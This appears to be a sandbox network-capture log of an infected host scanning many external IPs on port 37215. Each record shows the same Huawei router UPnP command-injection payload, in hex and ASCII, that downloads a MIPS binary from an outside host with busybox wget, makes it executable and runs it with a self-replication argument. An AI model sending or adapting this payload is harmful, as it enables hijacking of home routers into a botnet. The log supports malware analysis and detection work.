                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          615192.168.2.1532912197.232.119.637215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:51.604902029 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          616192.168.2.1557722197.228.151.3537215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:51.604926109 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                          May 28, 2024 09:55:51.849786043 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          617192.168.2.1557170157.176.125.11837215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:51.604938984 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          618192.168.2.1546676189.143.173.10837215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:51.604968071 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          619192.168.2.1534578197.52.140.3437215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:51.604994059 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          620192.168.2.154359841.30.139.13837215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:51.605016947 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          621192.168.2.1560176157.119.42.4937215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:51.605026007 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          622192.168.2.155526275.182.10.4237215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:51.605048895 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          623192.168.2.154593041.41.107.3137215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:51.605070114 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
